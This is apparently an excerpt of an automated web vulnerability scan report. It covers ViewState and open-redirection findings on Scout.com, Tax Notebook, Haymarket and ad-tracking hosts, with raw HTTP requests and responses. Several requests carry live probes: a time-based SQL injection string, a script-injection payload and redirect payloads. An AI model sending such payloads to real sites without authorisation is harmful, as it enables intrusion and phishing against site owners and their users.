<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTAzNTk4OTM0Mw9kFgJmD2QWAgIFD2QWBAIBD2QWAgIDD2QWFmYPFgIeB1Zpc2libGVnFgICAQ8PFgIeBFRleHQFJFRoZSBwYWdlIHlvdSByZXF1ZXN0ZWQgd2FzIG5vdCBmb3VuZGRkAgoPZBYCAgEPZBYCAgEPZBYCZg9kFgJmDxBkZBYAZAIND2QWAgIDD2QWAgIBD2QWAmYPZBYCZg8QZGQWAGQCEA9kFgQCBQ8QZGQWAGQCBw9kFgICAQ8QZGQWAWZkAhMPZBYCAgMPZBYeAgMPZBYCAgEPZBYCZg8PFgIfAWRkZAIED2QWAgIBD2QWAmYPDxYCHwFkZGQCBQ9kFgICAQ9kFgJmDw8WAh8BZGRkAgYPZBYCAgEPZBYCZg8PFgIfAWRkZAIHD2QWAgIBD2QWAmYPDxYCHwFkZGQCCA9kFgICAQ9kFgJmDw8WAh8BZGRkAgkPZBYCAgEPZBYCZg8PFgIfAWRkZAIKD2QWAgIBD2QWAmYPDxYCHwFkZGQCCw9kFgICAQ9kFgJmDxBkZBYBZmQCDA9kFgICAQ9kFgJmDw8WAh8BZGRkAg0PZBYCAgEPZBYCZg8QZGQWAGQCDg9kFgICAQ9kFgJmDw8WAh8BZGRkAg8PZBYCAgEPZBYCZg8PFgIfAWRkZAIQD2QWAgIBD2QWAmYPDxYCHwFkZGQCEQ9kFgICAQ9kFgJmDw8WAh8BZGRkAhUPZBYCAgMPZBYcAgQPZBYCAgEPZBYCZg8PFgIfAWRkZAIFD2QWAgIBD2QWAmYPDxYCHwFkZGQCBg9kFgICAQ9kFgJmDw8WAh8BZGRkAgcPZBYCAgEPZBYCZg8PFgIfAWRkZAIID2QWAgIBD2QWAmYPDxYCHwFkZGQCCQ9kFgICAQ9kFgJmDw8WAh8BZGRkAgoPZBYCAgEPZBYCZg8PFgIfAWRkZAILD2QWAgIBD2QWAmYPEGRkFgFmZAIMD2QWAgIBD2QWAmYPDxYCHwFkZGQCDQ9kFgICAQ9kFgJmDxBkZBYAZAIOD2QWAgIBD2QWAmYPDxYCHwFkZGQCDw9kFgICAQ9kFgJmDw8WAh8BZGRkAhAPZBYCAgEPZBYCZg8PFgIfAWRkZAIRD2QWAgIBD2QWAmYPDxYCHwFkZGQCGQ9kFgICAw8QZGQWAGQCHA9kFgICBQ8QZGQWAWZkAh0PZBYEAgcPEGRkFgBkAgkPEGRkFgBkAiUPZBYCAgcPZBYEAgEPZBYCAgEPZBYCZg8QZGQWAWZkAgQPZBYCAgEPZBYEZg8QZGQWAWZkAgMPEGRkFgFmZAIpD2QWAgIDD2QWBgIGD2QWAgIBD2QWAmYPEGRkFgFmZAIMD2QWAgIBD2QWAmYPEGRkFgFmZAISD2QWAgIBD2QWAmYPEGRkFgFmZAIDD2QWBAIBDxYCHwEFDVVBLTEyOTA0MjktMjVkAgMPFgIfAQULc2NtX19JUzExMDVkZA==" />
...[SNIP]...
15.4. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /subscribe/CCI_Custserve.aspx

Request

GET /subscribe/CCI_Custserve.aspx HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lvsr30zwf1fkw5aao1zymfq2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:27 GMT
Content-Length: 8523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Haymarket
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwMzMxNjMxMjAPZBYCAgMPZBYCAgEPZBYCAgEPZBYCZg9kFgICAQ8WAh4EVGV4dAWQEDx0YWJsZT48dHI+PHRkPjxhIGhyZWY9J2h0dHBzOi8vc3Vic2NyaWJlLmhheW1hcmtldG1lZGlhLmNvbS9jYWQvP2Y9Y3VzdHNlcnZlJz5DbGluaWNhbCBBZHZpc29yPC9hPjwvdGQ+PC90cj48dHI+PHRkPjxhIGhyZWY9J2h0dHA6Ly93d3cuZG1uZXdzLmNvbS9TdWJzY3JpYmUvc2VjdGlvbi8yMTMvJz5EaXJlY3QgTWFya2V0aW5nIE5ld3M8L2E+PC90ZD48L3RyPjx0cj48dGQ+PGEgaHJlZj0naHR0cHM6Ly9zdWJzY3JpYmUuaGF5bWFya2V0bWVkaWEuY29tL2phcC8/Zj1jdXN0c2VydmUnPkpvdXJuYWwgb2YgdGhlIEFtZXJpY2FuIEFjYWRlbXkgb2YgUGh5c2ljaWFuIEFzc2lzdGFudHM8L2E+PC90ZD48L3RyPjx0cj48dGQ+PGEgaHJlZj0naHR0cDovL3d3dy5tY2tuaWdodHMuY29tL1N1YnNjcmliZS9zZWN0aW9uLzI3NS8nPk1jS25pZ2h0J3MgTG9uZy1UZXJtIENhcmUgTmV3czwvYT48L3RkPjwvdHI+PHRyPjx0ZD48YSBocmVmPSdodHRwOi8vd3d3Lm1tbS1vbmxpbmUuY29tL1N1YnNjcmliZXItU2VydmljZXMvc2VjdGlvbi84MC8nPk1lZGljYWwgTWFya2V0aW5nICYgTWVkaWE8L2E+PC90ZD48L3RyPjx0cj48dGQ+PGEgaHJlZj0naHR0cDovL3d3dy5lbXByLmNvbS9jdXN0b21lcnNlcnZpY2UnPk1vbnRobHkgUHJlc2NyaWJpbmcgUmVmZXJlbmNlPC9hPjwvdGQ+PC90cj48dHI+PHRkPjxhIGhyZWY9J2h0dHA6Ly93d3cuZW1wci5jb20vY3VzdG9tZXJzZXJ2aWNlJz5NUFIgSGVtYXRvbG9neS9PbmNvbG9neSBFZGl0aW9uPC9hPjwvdGQ+PC90cj48dHI+PHRkPjxhIGhyZWY9J2h0dHA6Ly93d3cuZW1wci5jb20vY3VzdG9tZXJzZXJ2aWNlJz5NUFIgT2JzdGV0cmljaWFuICYgR3luZWNvbG9naXN0IEVkaXRpb248L2E+PC90ZD48L3RyPjx0cj48dGQ+PGEgaHJlZj0naHR0cDovL3d3dy5lbXByLmNvbS9jdXN0b21lcnNlcnZpY2UnPk1QUiBQZWRpYXRyaWNpYW5zJyBFZGl0aW9uPC9hPjwvdGQ+PC90cj48dHI+PHRkPjxhIGhyZWY9J2h0dHA6Ly93d3cuZW1wci5jb20vY3VzdG9tZXJzZXJ2aWNlJz5NUFIgUGhhcm1hY2lzdHMnIEVkaXRpb248L2E+PC90ZD48L3RyPjx0cj48dGQ+PGEgaHJlZj0naHR0cDovL3d3dy5lbXByLmNvbS9jdXN0b21lcnNlcnZpY2UnPk1QUiBSZXNpZGVudHMnIEVkaXRpb248L2E+PC90ZD48L3RyPjx0cj48dGQ+PGEgaHJlZj0naHR0cDovL3d3dy5lbXByLmNvbS9jdXN0b21lcnNlcnZpY2UnPk1QUiBVcm9sb2dpc3RzJyBFZGl0aW9uPC9hPjwvdGQ+PC90cj48dHI+PHRkPjxhIGhyZWY9J2h0dHBzOi8vc3Vic2NyaWJlLmhheW1hcmtldG1lZGlhLmNvbS9uZGQvP2Y9Y3VzdHNlcnZlJz5OZXcgRHJ1ZyBEb3NzaWVyPC9hPjwvdGQ+PC90cj48dHI+PHRkPjxhIGhyZWY9J2h0dHA6Ly93d3cuZW1wci5jb20vY3VzdG9tZXJzZXJ2aWNlJz5OdXJzZSBQcmFjdGl0aW9uZXJzJyBQcmVzY3JpYmluZyBSZWZlcmVuY2U8L2E+PC90ZD48L3RyPjx0cj48dGQ+PGEgaHJlZj0naHR0cHM6Ly9zdWJzY3JpYmUuaGF5bWFya2V0bWVkaWEuY29tL29uYS8/Zj1jdXN0c2VydmUnPk9uY29sb2d5IE51cnNlIEFkdmlzb3I8L2E+PC90ZD48L3RyPjx0cj48dGQ+PGEgaHJlZj0naHR0cDovL3d3dy5lbXByLmNvbS9jdXN0b21lcnNlcnZpY2UnPlBoeXNpY2lhbiBBc3Npc3RhbnRzJyBQcmVzY3JpYmluZyBSZWZlcmVuY2U8L2E+PC90ZD48L3RyPjx0cj48dGQ+PGEgaHJlZj0naHR0cDovL3d3dy5wcndlZWt1cy5jb20vQ3VzdG9tZXItU2VydmljZS9zZWN0aW9uLzE4Mi8nPlBSV2VlazwvYT48L3RkPjwvdHI+PHRyPjx0ZD48YSBocmVmPSdodHRwczovL3N1YnNjcmliZS5oYXltYXJrZXRtZWRpYS5jb20vcmFjLz9mPWN1c3RzZXJ2ZSc+UkFDRVI8L2E+PC90ZD48L3RyPjx0cj48dGQ+PGEgaHJlZj0naHR0cHM6Ly9zdWJzY3JpYmUuaGF5bWFya2V0bWVkaWEuY29tL3J1bi8/Zj1jdXN0c2VydmUnPlJlbmFsICYgVXJvbG9neSBOZXdzPC9hPjwvdGQ+PC90cj48dHI+PHRkPjxhIGhyZWY9J2h0dHA6Ly93d3cuc2NtYWdhemluZXVzLmNvbS9TdWJzY3JpYmUvc2VjdGlvbi8xMjInPlNDIE1hZ2F6aW5lPC9hPjwvdGQ+PC90cj48L3RhYmxlPmRk" />
...[SNIP]...
15.5. http://www.scout.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /

Request

GET / HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.2.9.1304728228796

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:30:31 GMT
Content-Type: text/html
Expires: Fri, 06 May 2011 19:40:31 GMT
Last-Modified: Fri, 06 May 2011 17:41:15 GMT
Accept-Ranges: bytes
ETag: "1CC0C14CC196F80"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 98822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com - College and High School Football, Basketball, Recruiti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...
15.6. http://www.scout.com/2/Netsparker14ebae4518d541eba819cda8fa442840.z  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/Netsparker14ebae4518d541eba819cda8fa442840.z

Request

GET /2/Netsparker14ebae4518d541eba819cda8fa442840.z HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 06 May 2011 19:56:50 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...
15.7. http://www.scout.com/2/a.z  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Request

GET /2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=202704078.454375544.1303509265.1303516031.1303522301.3

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:29:27 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:39:01 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Vary: Accept-Encoding
Content-Length: 11983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...
15.8. http://www.scout.com/Legacy/a.z  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /Legacy/a.z

Request

GET /Legacy/a.z HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304728142.1304731683.5; __utmc=202704078; UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmb=202704078.2.9.1304732669570;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 06 May 2011 20:44:56 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: public, s-maxage=600
Expires: Fri, 06 May 2011 20:54:56 GMT
Content-Type: text/html
Content-Length: 12238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...
15.9. http://www.scout.com/Netsparker892e409084b746c39d5b25ba070e12d8.z  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /Netsparker892e409084b746c39d5b25ba070e12d8.z

Request

GET /Netsparker892e409084b746c39d5b25ba070e12d8.z HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 06 May 2011 19:57:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Pike
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...
15.10. http://www.scout.com/PictureGallery.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /PictureGallery.aspx

Request

GET /PictureGallery.aspx HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304728142.1304731683.5; __utmc=202704078; UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmb=202704078.2.9.1304732669570;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 20:44:55 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2493


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head>
       <title>
           Scout.com:
           Photo Gallery</title>
       <style type="text/css">BODY { FONT-FAMILY: verdana, arial }

...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJLTUxNTAyNjY5D2QWAmYPZBYCAgEPPCsACQBkZA==" />
...[SNIP]...
15.11. http://www.scout.com/a.z  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Request

POST /a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate
Content-Length: 61

__VIEWSTATE=%2fwEPDwULLTEzNzQyNzE0MDlkZA%3d%3d&q=Search+Scout

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:57:50 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:07:49 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 27005

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Zack Williams Profile</title>
<meta http
...[SNIP]...
15.12. http://www.scout.com/search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /search.aspx

Request

GET /search.aspx HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304728142.1304731683.5; __utmc=202704078; UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmb=202704078.2.9.1304732669570;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 20:44:57 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14458

<!-- Start frame cache output for cachekey = (s=143&p=9&c=999.header) --><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<ht
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" />
...[SNIP]...
15.13. https://www.taxnotebook.com/Login/ChangePwd.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.taxnotebook.com
Path:   /Login/ChangePwd.aspx

Request

GET /Login/ChangePwd.aspx?AccNo= HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
Referer: https://www.taxnotebook.com/Login/TNLogin.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionStateGUID=d3f0c14d-633a-5811-67ba-46ed879ceb86

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 10090

<img src='../images/tnlogo.gif' width='96' height='23'>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Online federal and state tax preparation.</title>
   
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNjU0NDg2NDNkZA==" />
...[SNIP]...
15.14. https://www.taxnotebook.com/Login/PopupMessage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.taxnotebook.com
Path:   /Login/PopupMessage.aspx

Request

GET /Login/PopupMessage.aspx?usr=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000341)%3C/script%3E HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:49:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: SessionStateGUID=6faf2a0c-e41b-6cdb-5915-512ec79c7b90; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 6653

<img src='../images/tnlogo.gif' width='96' height='23'>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Tax Notebook</title>
       <LINK href="../Main.css" typ
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTU5NjA0OTc5D2QWAgIDD2QWAgIBDw8WAh4HVmlzaWJsZWdkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJX3ByZXZNYWlu" />
...[SNIP]...
15.15. https://www.taxnotebook.com/Login/TNLogin.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.taxnotebook.com
Path:   /Login/TNLogin.aspx

Request

GET /Login/TNLogin.aspx HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refaccno=759456; ASPSESSIONIDAABTDSBD=FMKFIPIDJPCACPMKKHGMNJHE

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: SessionStateGUID=819ade93-ce22-7d31-b53b-15e41cb9a483; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 10347

<img src='../images/tnlogo.gif' width='96' height='23'>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Tax Notebook</title>
       <link href="../Main.css" typ
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjA2NzY3ODc1ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQULX3JlbWVtYmVyTWU=" />
...[SNIP]...
16. Open redirection  previous  next
There are 3 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

16.1. http://a.triggit.com/pxbk [redir parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.triggit.com
Path:   /pxbk

Issue detail

The value of the redir request parameter is used to perform an HTTP redirect. The payload http%3a//af5e0e95996f8cc96/a%3fhttp%3a//tags.bluekai.com/site/2753%3fid%3dPARTNER_UUID was submitted in the redir parameter. This caused a redirection to the following URL:

Request

GET /pxbk?bk_uuid=dwzgv1ys99OETShB&redir=http%3a//af5e0e95996f8cc96/a%3fhttp%3a//tags.bluekai.com/site/2753%3fid%3dPARTNER_UUID HTTP/1.1
Host: a.triggit.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trgu=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

HTTP/1.1 302 Found
Location: http://af5e0e95996f8cc96/a?http://tags.bluekai.com/site/2753?id=c1e1301e-3a1f-4ca7-9870-f636b5f10e66
Date: Fri, 06 May 2011 22:34:57 GMT
Content-Length: 11
Content-Type: text/html; charset=ISO-8859-1

Redirecting
16.2. http://b.scorecardresearch.com/r [d.c parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//ae1138bbd2776f84f/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

Request

GET /r?c2=6035740&d.c=http%3a//ae1138bbd2776f84f/a%3fgif&d.o=dedominion&d.x=241937932&d.t=page&d.u=http%3A%2F%2Fdominionenterprises.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
